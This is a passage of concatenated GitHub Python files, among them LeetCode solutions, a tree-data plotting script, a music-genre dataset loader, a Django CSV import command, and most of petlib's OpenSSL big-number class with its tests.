np.argmax(p))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"satyrswang/practice-python","sub_path":"yin-tech/implement-keras/softmax.py","file_name":"softmax.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19381321190","text":"'''\nProblem Statement - Given an integer array nums, \nreturn true if any value appears at least twice in the array, \nand return false if every element is distinct.\nExample 1:\n\nInput: nums = [1,2,3,1]\nOutput: true\nExample 2:\n\nInput: nums = [1,2,3,4]\nOutput: false\n'''\n\n#Solution 1 - using dict\n\nclass Solution:\n def containsDuplicate(self, nums: List[int]) -> bool:\n #create an empty dict\n numsDict = {}\n for num in nums:\n '''if the key for that particular num is made already \n then the number already exists in the list, so return True'''\n if num in numsDict:\n return True\n #else add the entry for the new number\n else:\n numsDict[num] = 1\n #return false at the end of the list\n return False\n\n#Solution 1 - using set(contains unique entries)\n\nclass Solution:\n def containsDuplicate(self, nums: List[int]) -> bool:\n return len(set(nums)) < len(nums)","repo_name":"priyamore/lc-problems","sub_path":"data-structures/containsDuplicate.py","file_name":"containsDuplicate.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30113738105","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 13 19:27:48 2022\n\n@author: juani\n\"\"\"\n\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport csv\n\ndef leer_arboles(nombre_archivo):\n f = open(nombre_archivo, encoding='UTF-8')\n rows = csv.reader(f)\n headers = next(rows)\n print(headers)\n arboleda = [dict(zip(headers, row)) for row in rows]\n return arboleda\n\n\n\n#6.10 descomentar linea 27 y comentar linea 48\nos.path.join('..', 'Data', 'arbolado-en-espacios-verdes.csv')\narboleda = leer_arboles('../Data/arbolado-en-espacios-verdes.csv')\naltura_jacaranda = [(float(arbol['altura_tot'])) for arbol in arboleda if arbol['nombre_com'] == 'Jacarandá']\n#plt.hist(altura_jacaranda, bins = 30)\naltura_jacaranda.sort()\nprint(altura_jacaranda)\n\n\n#5.17\nmedidas_jacaranda = [(float(arbol['altura_tot']), int(arbol['diametro']))\nfor arbol in arboleda if arbol['nombre_com'] == 'Jacarandá']\nprint(medidas_jacaranda)\n\n\n#6.11 \ndef scatter_hd(lista_de_pares):\n lista_de_pares=np.array(lista_de_pares)\n plt.scatter(lista_de_pares[:,0] , lista_de_pares[:,1] ,alpha=0.5, c='RED')\n plt.colorbar(label='Gamma Ray - API')\n plt.xlabel(\"diametro (cm)\")\n plt.ylabel(\"alto (m)\")\n plt.title(\"Relación diámetro-alto para Jacarandás\")\n plt.show()\n \nscatter_hd(medidas_jacaranda)\n\n\n# def medidas_de_especies(especies, arboleda):\n# medidas = []\n# medidas.append([{e:(float(arbol['altura_tot']), int(arbol['diametro']))}for e in especies for arbol in arboleda if arbol['nombre_com'] == e])\n# return medidas\n\n# os.path.join('..', 'Data', 'arbolado-en-espacios-verdes.csv')\n# arboleda = leer_arboles('../Data/arbolado-en-espacios-verdes.csv')\n# especies = ['Eucalipto', 'Palo borracho rosado', 'Jacarandá']\n# medidas = medidas_de_especies(especies, arboleda)\n# scatter_hd(medidas)","repo_name":"juanamolinalucia2001/python2C-unsam2022","sub_path":"Clase06/arboles.py","file_name":"arboles.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28762610110","text":"'''\nGiven an unsorted array nums, reorder it such that nums[0] < nums[1] > nums[2] < nums[3]....\n\nExample 1:\n\nInput: nums = [1, 5, 1, 1, 6, 4]\nOutput: One possible answer is [1, 4, 1, 5, 1, 6].\nExample 2:\n\nInput: nums = [1, 3, 2, 2, 3, 1]\nOutput: One possible answer is [2, 3, 1, 3, 1, 2].\nNote:\nYou may assume all input has valid answer.\n\nFollow Up:\nCan you do it in O(n) time and/or in-place with O(1) extra space?\n题意:排序问题\n思路:先对数组排序,然后把数组分成两半,数组的奇数部分倒序插入数组前半部分的元素,\n数组的偶数部分倒序插入数组后半部分元素 时间复杂度O(nlogn),空间复杂度O(n)\n'''\nclass Solution:\n def wiggleSort(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n if len(nums)<=1:\n return\n nums.sort()\n med = (len(nums)-1)//2\n nums[::2],nums[1::2]=nums[med::-1],nums[:med:-1]\n ","repo_name":"LiqunW/LeetCode","sub_path":"LeetCode_python_solution/324. Wiggle Sort II.py","file_name":"324. Wiggle Sort II.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73957139253","text":"import os\nimport re\nimport numpy as np\nimport cv2\nfrom audio_to_melSpectrogram import create_spectrogram\nfrom slice_melSpectrogram import slice_spectrogram\nfrom keras.utils import np_utils\nfrom sklearn.model_selection import train_test_split\n\n\"\"\"\nConverts images and labels into training and testing matrices.\n\"\"\"\ndef load_dataset(mode='Train'):\n create_spectrogram(mode)\n slice_spectrogram(mode)\n\n if mode==\"Train\":\n genre = {\n \"Hip-Hop\": 0,\n \"International\": 1,\n \"Electronic\": 2,\n \"Folk\" : 3,\n \"Experimental\": 4,\n \"Rock\": 5,\n \"Pop\": 6,\n \"Instrumental\": 7\n }\n filenames = [\"Train_Sliced_Images\" + '/' + f for f in os.listdir(\"Train_Sliced_Images\")\n if f.endswith(\".jpg\")]\n images_all = [None]*(len(filenames))\n labels_all = [None]*(len(filenames))\n for f in filenames:\n index = int(re.search('Train_Sliced_Images/(.+?)_.*.jpg', f).group(1))\n genre_variable = re.search('Train_Sliced_Images/.*_(.+?).jpg', f).group(1)\n temp = cv2.imread(f, cv2.IMREAD_UNCHANGED)\n images_all[index] = cv2.cvtColor(temp, cv2.COLOR_BGR2GRAY)\n labels_all[index] = genre[genre_variable]\n \n images = np.array(images_all)\n labels = np.array(labels_all)\n labels = labels.reshape(labels.shape[0],1)\n train_x, test_x, train_y, test_y = train_test_split(images, labels, test_size=0.05, shuffle=True)\n\n # Convert the labels into one-hot vectors.\n train_y = np_utils.to_categorical(train_y)\n test_y = np_utils.to_categorical(test_y, num_classes=8)\n n_classes = len(genre)\n genre_new = {value: key for key, value in genre.items()}\n\n if os.path.exists('Training_Data'):\n train_x = np.load(\"Training_Data/train_x.npy\")\n train_y = np.load(\"Training_Data/train_y.npy\")\n test_x = np.load(\"Training_Data/test_x.npy\")\n test_y = np.load(\"Training_Data/test_y.npy\")\n return train_x, train_y, test_x, test_y, n_classes, genre_new\n\n if not os.path.exists('Training_Data'):\n os.makedirs('Training_Data')\n np.save(\"Training_Data/train_x.npy\", train_x)\n np.save(\"Training_Data/train_y.npy\", train_y)\n np.save(\"Training_Data/test_x.npy\", test_x)\n np.save(\"Training_Data/test_y.npy\", test_y)\n return train_x, train_y, test_x, test_y, n_classes, genre_new\n\n if mode==\"Test\":\n filenames = [\"Test_Sliced_Images\" + '/' + f for f in os.listdir(\"Test_Sliced_Images\")\n if f.endswith(\".jpg\")]\n images = []\n labels = []\n for f in filenames:\n song_variable = re.search('Test_Sliced_Images/.*_(.+?).jpg', f).group(1)\n tempImg = cv2.imread(f, cv2.IMREAD_UNCHANGED)\n images.append(cv2.cvtColor(tempImg, cv2.COLOR_BGR2GRAY))\n labels.append(song_variable)\n \n images = np.array(images)\n return images, labels\n \nif __name__ == '__main__':\n load_dataset(mode='Train')","repo_name":"XuBLin/590PresentGroupProject","sub_path":"Recommendation system/project_final/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15946355456","text":"import csv\n\nfrom django.core.management.base import BaseCommand\nfrom reviews.models import Category, Comment, Genre, Review, Title\nfrom users.models import User\n\n\ndef validate_required_fields(row: dict) -> bool:\n \"\"\"\"Проверяет наличие обязательных полей.\"\"\"\n\n ignore_fields: list = [\n 'description',\n 'role',\n 'bio',\n 'first_name',\n 'last_name',\n 'author',\n 'pub_date'\n ]\n\n for key, value in row.items():\n if not value and key not in ignore_fields:\n return False\n\n return True\n\n\ndef upload_users():\n \"\"\"Загружает пользователей.\"\"\"\n\n with open('static/data/users.csv', encoding='utf-8') as csv_file:\n csv_reader = csv.DictReader(csv_file, delimiter=',')\n\n for row in csv_reader:\n if not validate_required_fields(row):\n continue\n\n user = User()\n user.id = row['id']\n user.username = row['username']\n user.email = row['email']\n user.role = row['role']\n user.bio = row['bio']\n user.first_name = row['first_name']\n user.last_name = row['last_name']\n\n user.save()\n\n\ndef upload_category():\n \"\"\"Загружает категории.\"\"\"\n\n with open('static/data/category.csv', encoding='utf-8') as csv_file:\n csv_reader = csv.DictReader(csv_file, delimiter=',')\n\n for row in csv_reader:\n if not validate_required_fields(row):\n continue\n\n category = Category()\n category.id = row['id']\n category.name = row['name']\n category.slug = row['slug']\n\n category.save()\n\n\ndef upload_genre():\n \"\"\"Загружает жанры.\"\"\"\n\n with open('static/data/genre.csv', encoding='utf-8') as csv_file:\n csv_reader = csv.DictReader(csv_file, delimiter=',')\n\n for row in csv_reader:\n if not validate_required_fields(row):\n continue\n\n genre = Genre()\n genre.id = row['id']\n genre.name = row['name']\n genre.slug = row['slug']\n\n genre.save()\n\n\ndef upload_titles():\n \"\"\"Загружает произведения.\"\"\"\n\n with open('static/data/titles.csv', encoding='utf-8') as csv_file:\n csv_reader = csv.DictReader(csv_file, delimiter=',')\n\n for row in csv_reader:\n if not validate_required_fields(row):\n continue\n\n title = Title()\n title.id = row['id']\n title.name = row['name']\n title.year = row['year']\n title.category = Category.objects.get(id=row['category'])\n\n title.save()\n\n\ndef upload_genre_title():\n \"\"\"Загружает промежуточную таблицу с жанрами и произведениями.\"\"\"\n\n with open('static/data/genre_title.csv', encoding='utf-8') as csv_file:\n csv_reader = csv.DictReader(csv_file, delimiter=',')\n\n for row in csv_reader:\n if not validate_required_fields(row):\n continue\n\n title = Title.objects.get(id=row['title_id'])\n genre = Genre.objects.get(id=row['genre_id'])\n\n title.genre.add(genre)\n title.save()\n\n\ndef upload_review():\n \"\"\"Загружает отзывы.\"\"\"\n\n with open('static/data/review.csv', encoding='utf-8') as csv_file:\n csv_reader = csv.DictReader(csv_file, delimiter=',')\n\n for row in csv_reader:\n if not validate_required_fields(row):\n continue\n\n review = Review()\n review.id = row['id']\n review.title = Title.objects.get(id=row['title_id'])\n review.text = row['text']\n review.author = User.objects.get(id=row['author'])\n review.score = row['score']\n review.pub_date = row['pub_date']\n\n review.save()\n\n\ndef upload_comments():\n \"\"\"Загружает комментарии.\"\"\"\n\n with open('static/data/comments.csv', encoding='utf-8') as csv_file:\n csv_reader = csv.DictReader(csv_file, delimiter=',')\n\n for row in csv_reader:\n if not validate_required_fields(row):\n continue\n\n comment = Comment()\n comment.id = row['id']\n comment.review = Review.objects.get(id=row['review_id'])\n comment.text = row['text']\n comment.author = User.objects.get(id=row['author'])\n comment.pub_date = row['pub_date']\n\n comment.save()\n\n\nclass Command(BaseCommand):\n\n def handle(self):\n upload_users()\n upload_category()\n upload_genre()\n upload_titles()\n upload_genre_title()\n upload_review()\n upload_comments()\n","repo_name":"Luna-luns/Review-s-collector","sub_path":"api_yamdb/reviews/management/commands/upload_data.py","file_name":"upload_data.py","file_ext":"py","file_size_in_byte":4836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2506488688","text":"from .bindings import _FFI, _C, get_errors\n\nfrom functools import wraps\nfrom copy import copy, deepcopy\nfrom binascii import hexlify, unhexlify # pylint: disable=unused-import\n\n# Py2/3 compatibility\ntry:\n from builtins import int # pylint: disable=redefined-builtin\n from builtins import object # pylint: disable=redefined-builtin\nexcept BaseException: # pylint: disable=bare-except\n print(\"Cannot mock for docs\")\n\ntry:\n from future.utils import python_2_unicode_compatible\nexcept Exception as e: # pylint: disable=broad-except\n # An identity decorator\n def python_2_unicode_compatible(x): return x\n\nimport pytest\n\n\ndef force_Bn(n):\n \"\"\"A decorator that coerces the nth input to be a Big Number\"\"\"\n\n def convert_nth(f):\n # pylint: disable=star-args\n @wraps(f)\n def new_f(*args, **kwargs):\n new_args = args\n try:\n if not n < len(args) or args[n].bn: # isinstance(args[n], Bn):\n new_args = args\n except BaseException:\n # if not n < len(args):\n # new_args = args\n\n if isinstance(args[n], int):\n r = Bn.from_num(args[n])\n new_args = list(args)\n new_args[n] = r\n new_args = tuple(new_args)\n else:\n return NotImplemented\n\n return f(*new_args, **kwargs)\n\n return new_f\n return convert_nth\n\n\ndef _check(return_val):\n \"\"\"Checks the return code of the C calls\"\"\"\n if __debug__:\n if isinstance(return_val, int) and return_val == 1:\n return\n if isinstance(return_val, bool) and return_val == True:\n return\n\n if return_val == True and return_val == 1:\n return\n\n errs = get_errors()\n raise Exception(\"BN exception: %s\" % errs)\n\n\nclass BnCtx(object):\n \"\"\" A Bn Context for use by the petlib library \"\"\"\n\n __slots__ = ['bnctx', '_C']\n\n def __init__(self):\n self._C = _C\n self.bnctx = self._C.BN_CTX_new()\n _check(self.bnctx != _FFI.NULL)\n\n def __del__(self):\n if self.bnctx is not None:\n self._C.BN_CTX_free(self.bnctx)\n\n\nclass BnCtxNULL(BnCtx):\n \"\"\" A Bn Context for use by the petlib library \"\"\"\n\n __slots__ = ['bnctx', '_C']\n\n def __init__(self):\n self._C = _C\n self.bnctx = _FFI.NULL\n\n def __del__(self):\n pass\n\n\nimport threading\n_thread_local = threading.local()\n\n\ndef get_ctx():\n global _thread_local\n\n try:\n return _thread_local.ctx\n except BaseException:\n _thread_local.ctx = BnCtx()\n return _thread_local.ctx\n\n\n@python_2_unicode_compatible\nclass Bn(object):\n \"\"\"The core Big Number class.\n It supports all comparisons (<, <=, ==, !=, >=, >),\n arithmetic operations (+, -, %, /, divmod, pow)\n and copy operations (copy and deep copy). The right-hand\n side operand may be a small native python integer (<2^64). \"\"\"\n\n __C = _C\n\n # We know this class will keep minimal state\n __slots__ = ['bn']\n\n # -- static methods\n\n @staticmethod\n def from_num(num):\n if isinstance(num, int):\n return Bn(num)\n elif isinstance(num, Bn):\n return num\n else:\n # raise TypeError(\"Cannot coerce %s into a BN.\" % num)\n return NotImplemented\n\n @staticmethod\n def from_decimal(sdec):\n \"\"\"Creates a Big Number from a decimal string.\n\n Args:\n sdec (string): numeric string possibly starting with minus.\n\n See Also:\n str() produces a decimal string from a big number.\n\n Example:\n >>> hundred = Bn.from_decimal(\"100\")\n >>> str(hundred)\n '100'\n\n \"\"\"\n\n ptr = _FFI.new(\"BIGNUM **\")\n read_bytes = _C.BN_dec2bn(ptr, sdec.encode(\"utf8\"))\n if read_bytes != len(sdec):\n raise Exception(\"BN Error\")\n\n ret = Bn()\n _C.BN_copy(ret.bn, ptr[0])\n _C.BN_clear_free(ptr[0])\n return ret\n\n @staticmethod\n def from_hex(shex):\n \"\"\"Creates a Big Number from a hexadecimal string.\n\n Args:\n shex (string): hex (0-F) string possibly starting with minus.\n\n See Also:\n hex() produces a hexadecimal representation of a big number.\n\n Example:\n >>> Bn.from_hex(\"FF\")\n 255\n \"\"\"\n\n ptr = _FFI.new(\"BIGNUM **\")\n read_bytes = _C.BN_hex2bn(ptr, shex.encode(\"utf8\"))\n if read_bytes != len(shex):\n raise Exception(\"BN Error\")\n\n ret = Bn()\n _C.BN_copy(ret.bn, ptr[0])\n _C.BN_clear_free(ptr[0])\n return ret\n\n @staticmethod\n def from_binary(sbin):\n \"\"\"Creates a Big Number from a byte sequence representing the number in Big-endian 8 byte atoms. Only positive values can be represented as byte sequence, and the library user should store the sign bit separately.\n\n Args:\n sbin (string): a byte sequence.\n\n Example:\n >>> byte_seq = unhexlify(b\"010203\")\n >>> Bn.from_binary(byte_seq)\n 66051\n >>> (1 * 256**2) + (2 * 256) + 3\n 66051\n \"\"\"\n ret = Bn()\n _C.BN_bin2bn(sbin, len(sbin), ret.bn)\n return ret\n\n @staticmethod\n def get_prime(bits, safe=1):\n \"\"\"\n Builds a prime Big Number of length bits.\n\n Args:\n bits (int) -- the number of bits.\n safe (int) -- 1 for a safe prime, otherwise 0.\n\n \"\"\"\n _check(0 < bits < 10000)\n _check(safe in [0, 1])\n\n ret = Bn()\n _check(\n _C.BN_generate_prime_ex(\n ret.bn,\n bits,\n safe,\n _FFI.NULL,\n _FFI.NULL,\n _FFI.NULL))\n return ret\n\n ## -- methods\n\n _upper_bound = 2**(64 - 1)\n\n def __init__(self, num=0):\n 'Allocate a Big Number structure, initialized with a small integer or zero.'\n self.bn = _C.BN_new()\n\n if num == 0:\n return\n\n if __debug__:\n _check(0 <= abs(num) <= self._upper_bound)\n _check(isinstance(num, int))\n\n # Assign\n if num != 0:\n ret = _C.BN_set_word(self.bn, abs(num))\n if __debug__:\n _check(ret)\n if ret != 1:\n raise Exception(\"Bn Exception.\")\n\n if num < 0:\n self._set_neg(1)\n\n def _set_neg(self, sign=1):\n # \"\"\"Sets the sign to \"-\" (1) or \"+\" (0)\"\"\"\n if not (sign == 0 or sign == 1):\n raise Exception(\"Sign has to be 0 or 1.\")\n _C.BN_set_negative(self.bn, sign)\n\n def copy(self):\n \"\"\"Returns a copy of the Bn object.\"\"\"\n return self.__copy__()\n\n def __copy__(self):\n # 'Copies the big number. Support for copy module'\n other = Bn()\n _C.BN_copy(other.bn, self.bn)\n return other\n\n def __deepcopy__(self, memento):\n # 'Deepcopy is the same as copy'\n # pylint: disable=unused-argument\n return self.__copy__()\n\n def __del__(self):\n # 'Deallocate all resources of the big number'\n self.__C.BN_clear_free(self.bn)\n\n def __inner_cmp__(self, other):\n # 'Irel comparison function'\n # if __debug__:\n # _check( type(other) == Bn )\n try:\n sig = int(_C.BN_cmp(self.bn, other.bn))\n return sig\n except AttributeError:\n return self.__inner_cmp__(Bn.from_num(other))\n\n def __lt__(self, other):\n return self.__inner_cmp__(other) < 0\n\n def __le__(self, other):\n return self.__inner_cmp__(other) <= 0\n\n def __eq__(self, other):\n if isinstance(other, int):\n other = Bn(other)\n if not isinstance(other, Bn):\n return False\n return self.__inner_cmp__(other) == 0\n\n def __ne__(self, other):\n return self.__inner_cmp__(other) != 0\n\n def __gt__(self, other):\n return self.__inner_cmp__(other) > 0\n\n def __ge__(self, other):\n return self.__inner_cmp__(other) >= 0\n\n def bool(self):\n 'Turn Bn into boolean. False if zero, True otherwise.'\n return self.__bool__()\n\n def __bool__(self):\n # 'Turn into boolean'\n return not (self == Bn(0))\n\n # Python 2 compatibility\n def __nonzero__(self):\n return self.__bool__()\n\n # Export in different representations\n\n def repr(self):\n 'The representation of the number as a decimal string'\n return self.__repr__()\n\n def __repr__(self):\n # 'The representation of the number as a decimal string'\n buf = _C.BN_bn2dec(self.bn)\n s = bytes(_FFI.string(buf))\n _C.OPENSSL_free(buf)\n return s.decode('utf8')\n\n def int(self):\n \"\"\"A native python integer representation of the Big Number.\n Synonym for int(bn).\n \"\"\"\n return self.__int__()\n\n def __int__(self):\n return int(self.__repr__())\n\n def __index__(self):\n return int(self.__repr__())\n\n def hex(self):\n \"\"\"The representation of the string in hexadecimal.\n Synonym for hex(n).\"\"\"\n return self.__hex__()\n\n def __hex__(self):\n # \"\"\"The representation of the string in hexadecimal\"\"\"\n buf = _C.BN_bn2hex(self.bn)\n s = bytes(_FFI.string(buf))\n _C.OPENSSL_free(buf)\n return s.decode(\"utf8\")\n\n def binary(self):\n \"\"\"Returns a byte sequence storing the absolute value of the Big\n Number in Big-Endian format (with 8 bit atoms). You need to extact the sign separately.\n\n Example:\n >>> bin = Bn(66051).binary()\n >>> hexlify(bin) == b'010203'\n True\n \"\"\"\n if self < 0:\n raise Exception(\"Cannot represent negative numbers\")\n size = _C.bn_num_bytes(self.bn)\n bin_string = _FFI.new(\"unsigned char[]\", size)\n\n l = _C.BN_bn2bin(self.bn, bin_string)\n assert int(l) == size\n return bytes(_FFI.buffer(bin_string)[:])\n\n def random(self):\n \"\"\"Returns a cryptographically strong random number 0 <= rnd < self.\n\n Example:\n >>> r = Bn(100).random()\n >>> 0 <= r < 100\n True\n\n \"\"\"\n rnd = Bn()\n err = _C.BN_rand_range(rnd.bn, self.bn)\n if __debug__:\n _check(err)\n return rnd\n\n # ---------- Arithmetic --------------\n\n def int_neg(self):\n \"\"\"Returns the negative of this number. Synonym with -self.\n\n Example:\n\n >>> one100 = Bn(100)\n >>> one100.int_neg()\n -100\n >>> -one100\n -100\n\n \"\"\"\n return self.__neg__()\n\n def int_add(self, other):\n \"\"\"Returns the sum of this number with another. Synonym for self + other.\n\n Example:\n\n >>> one100 = Bn(100)\n >>> two100 = Bn(200)\n >>> two100.int_add(one100) # Function syntax\n 300\n >>> two100 + one100 # Operator syntax\n 300\n\n \"\"\"\n return self.__add__(other)\n\n def __radd__(self, other):\n return self.__add__(other)\n\n def __add__(self, other):\n try:\n r = Bn()\n err = _C.BN_add(r.bn, self.bn, other.bn)\n\n if __debug__:\n _check(err)\n return r\n except AttributeError:\n return self.__add__(Bn.from_num(other))\n\n def int_sub(self, other):\n \"\"\"Returns the difference between this number and another.\n Synonym for self - other.\n\n Example:\n\n >>> one100 = Bn(100)\n >>> two100 = Bn(200)\n >>> two100.int_sub(one100) # Function syntax\n 100\n >>> two100 - one100 # Operator syntax\n 100\n\n \"\"\"\n return self - other\n\n def __rsub__(self, other):\n return Bn(other) - self\n\n def __sub__(self, other):\n try:\n r = Bn()\n err = _C.BN_sub(r.bn, self.bn, other.bn)\n\n if __debug__:\n _check(err)\n\n return r\n except AttributeError:\n return self.__sub__(Bn.from_num(other))\n\n def int_mul(self, other):\n \"\"\"Returns the product of this number with another.\n Synonym for self * other.\n\n Example:\n\n >>> one100 = Bn(100)\n >>> two100 = Bn(200)\n >>> one100.int_mul(two100) # Function syntax\n 20000\n >>> one100 * two100 # Operator syntax\n 20000\n\n \"\"\"\n return self.__mul__(other)\n\n def __rmul__(self, other):\n return self.__mul__(other)\n\n def __mul__(self, other):\n\n try:\n r = Bn()\n local_ctx = get_ctx()\n err = _C.BN_mul(r.bn, self.bn, other.bn, local_ctx.bnctx)\n\n if __debug__:\n _check(err)\n\n return r\n except AttributeError:\n other = Bn.from_num(other)\n if other is NotImplemented:\n return NotImplemented\n return self.__mul__(other)\n\n\n# ------------------ Mod arithmetic -------------------------\n\n\n def mod_add(self, other, m):\n \"\"\"\n mod_add(other, m)\n Returns the sum of self and other modulo m.\n\n Example:\n\n >>> Bn(10).mod_add(Bn(2), Bn(11)) # Only function notation available\n 1\n\n \"\"\"\n try:\n r = Bn()\n local_ctx = get_ctx()\n err = _C.BN_mod_add(r.bn, self.bn, other.bn, m.bn, local_ctx.bnctx)\n if __debug__:\n _check(err)\n\n return r\n except AttributeError:\n return self.mod_add(Bn.from_num(other), Bn.from_num(m))\n\n def mod_sub(self, other, m):\n \"\"\"\n mod_sub(other, m)\n Returns the difference of self and other modulo m.\n\n Example:\n\n >>> Bn(10).mod_sub(Bn(2), Bn(11)) # Only function notation available\n 8\n\n \"\"\"\n\n try:\n r = Bn()\n local_ctx = get_ctx()\n err = _C.BN_mod_sub(r.bn, self.bn, other.bn, m.bn, local_ctx.bnctx)\n\n if __debug__:\n _check(err)\n\n return r\n except AttributeError:\n return self.mod_sub(Bn.from_num(other), Bn.from_num(m))\n\n def mod_mul(self, other, m):\n \"\"\"\n mod_mul(other, m)\n Return the product of self and other modulo m.\n\n Example:\n\n >>> Bn(10).mod_mul(Bn(2), Bn(11)) # Only function notation available\n 9\n\n \"\"\"\n try:\n r = Bn()\n local_ctx = get_ctx()\n err = _C.BN_mod_mul(r.bn, self.bn, other.bn, m.bn, local_ctx.bnctx)\n\n if __debug__:\n _check(err)\n\n return r\n except AttributeError:\n return self.mod_mul(Bn.from_num(other), Bn.from_num(m))\n\n def mod_inverse(self, m):\n \"\"\"\n mod_inverse(m)\n Compute the inverse mod m, such that self * res == 1 mod m.\n\n Example:\n\n >>> Bn(10).mod_inverse(m = Bn(11)) # Only function notation available\n 10\n >>> Bn(10).mod_mul(Bn(10), m = Bn(11)) == Bn(1)\n True\n\n \"\"\"\n\n try:\n res = Bn()\n local_ctx = get_ctx()\n err = _C.BN_mod_inverse(res.bn, self.bn, m.bn, local_ctx.bnctx)\n\n if err == _FFI.NULL:\n errs = get_errors()\n\n if errs == [50770023]:\n raise Exception(\"No inverse\")\n\n elif errs == [50782316]:\n raise Exception(\"No inverse\")\n\n else:\n raise Exception(\"Unknown error: %s\" % errs)\n\n return res\n except AttributeError:\n return self.mod_inverse(Bn.from_num(m))\n\n def mod_pow(self, other, m, ctx=None):\n \"\"\" Performs the modular exponentiation of self ** other % m.\n\n Example:\n >>> one100 = Bn(100)\n >>> one100.mod_pow(2, 3) # Modular exponentiation\n 1\n\n \"\"\"\n return self.__pow__(other, m, ctx=ctx)\n\n def divmod(self, other):\n \"\"\"Returns the integer division and remainder of this number by another.\n Synonym for (div, mod) = divmod(self, other)\"\"\"\n return self.__divmod__(other)\n\n def __rdivmod__(self, other):\n return Bn(other).__divmod__(self)\n\n def __divmod__(self, other):\n try:\n dv = Bn()\n rem = Bn()\n local_ctx = get_ctx()\n ret = _C.BN_div(dv.bn, rem.bn, self.bn, other.bn, local_ctx.bnctx)\n if __debug__:\n _check(ret)\n return (dv, rem)\n except AttributeError:\n return self.__divmod__(Bn.from_num(other))\n\n def int_div(self, other):\n \"\"\"Returns the integer division of this number by another.\n Synonym of self / other.\n\n Example:\n\n >>> one100 = Bn(100)\n >>> two100 = Bn(200)\n >>> two100.int_div(one100) # Function syntax\n 2\n >>> two100 / one100 # Operator syntax\n 2\n\n \"\"\"\n return self.__div__(other)\n\n def __rdiv__(self, other):\n return Bn(other).__div__(self)\n\n def __div__(self, other):\n dv, _ = divmod(self, other)\n return dv\n\n def mod(self, other):\n \"\"\"Returns the remainder of this number modulo another.\n Synonym for self % other.\n\n Example:\n\n >>> one100 = Bn(100)\n >>> two100 = Bn(200)\n >>> two100.mod(one100) # Function syntax\n 0\n >>> two100 % one100 # Operator syntax\n 0\n\n\n \"\"\"\n return self.__mod__(other)\n\n def __rmod__(self, other):\n return Bn(other).__mod__(self)\n\n def __mod__(self, other):\n\n try:\n rem = Bn()\n\n local_ctx = get_ctx()\n err = _C.BN_nnmod(rem.bn, self.bn, other.bn, local_ctx.bnctx)\n\n if __debug__:\n _check(err)\n return rem\n except AttributeError:\n self.__mod__(Bn.from_num(other))\n\n def __rtruediv__(self, other):\n return Bn(other).__truediv__(self)\n\n def __truediv__(self, other):\n return self.__div__(other)\n\n def __rfloordiv__(self, other):\n return Bn(other).__floordiv__(self)\n\n def __floordiv__(self, other):\n return self.__div__(other)\n\n def __rpow__(self, other):\n return Bn(other).__pow__(self)\n\n def pow(self, other, modulo=None, ctx=None):\n \"\"\"Returns the number raised to the power other optionally modulo a third number.\n Synonym with pow(self, other, modulo).\n\n Example:\n\n >>> one100 = Bn(100)\n >>> one100.pow(2) # Function syntax\n 10000\n >>> one100 ** 2 # Operator syntax\n 10000\n >>> one100.pow(2, 3) # Modular exponentiation\n 1\n\n \"\"\"\n if modulo:\n return self.__pow__(other, modulo, ctx)\n else:\n return self ** other\n\n def __pow__(self, other, modulo=None, ctx=None):\n\n try:\n res = Bn()\n\n if ctx is None:\n ctx = BnCtx()\n\n if modulo is None:\n _check(_C.BN_exp(res.bn, self.bn, other.bn, ctx.bnctx))\n else:\n _check(\n _C.BN_mod_exp(\n res.bn,\n self.bn,\n other.bn,\n modulo.bn,\n ctx.bnctx))\n\n return res\n except BaseException:\n other = Bn.from_num(other)\n if modulo is not None:\n modulo = Bn.from_num(modulo)\n return self.__pow__(other, modulo, ctx)\n\n def is_prime(self):\n \"\"\"Returns True if the number is prime, with negligible prob. of error.\"\"\"\n\n res = int(_C.BN_is_prime_ex(self.bn, 0, get_ctx().bnctx, _FFI.NULL))\n if res == 0:\n return False\n if res == 1:\n return True\n raise Exception(\"Primality test failure %s\" % int(res))\n\n def is_odd(self):\n \"\"\"Returns True if the number is odd.\"\"\"\n\n return bool(_C.bn_is_odd(self.bn))\n\n def is_bit_set(self, n):\n \"\"\"Returns True if the nth bit is set\"\"\"\n return int(_C.BN_is_bit_set(self.bn, n))\n\n def num_bits(self):\n \"\"\"Returns the number of bits representing this Big Number\"\"\"\n return int(_C.BN_num_bits(self.bn))\n\n # Implement negative\n def __neg__(self):\n # pylint: disable=protected-access\n zero = Bn(0)\n ret = copy(self)\n if ret >= zero:\n ret._set_neg(1)\n else:\n ret._set_neg(0)\n return ret\n\n def __hash__(self):\n return int(self).__hash__()\n\n# Unsuported\n# object.__lshift__(self, other)\n# object.__rshift__(self, other)\n# object.__and__(self, other)\n# object.__xor__(self, other)\n# object.__or__(self, other)\n\n# ---------- Tests ------------\n\n\ndef test_bn_constructors():\n assert Bn.from_decimal(\"100\") == 100\n assert Bn.from_decimal(\"-100\") == -100\n\n with pytest.raises(Exception) as excinfo:\n Bn.from_decimal(\"100ABC\")\n assert 'BN Error' in str(excinfo.value)\n\n with pytest.raises(Exception) as excinfo:\n Bn.from_hex(\"100ABCZ\")\n assert 'BN Error' in str(excinfo.value)\n\n assert Bn.from_hex(Bn(-100).hex()) == -100\n assert Bn(15).hex() == Bn(15).hex()\n\n with pytest.raises(Exception) as excinfo:\n Bn(-100).binary()\n assert 'negative' in str(excinfo.value)\n\n #assert Bn.from_binary(Bn(-100).binary()) == 100\n assert Bn.from_binary(Bn(100).binary()) == Bn(100)\n assert 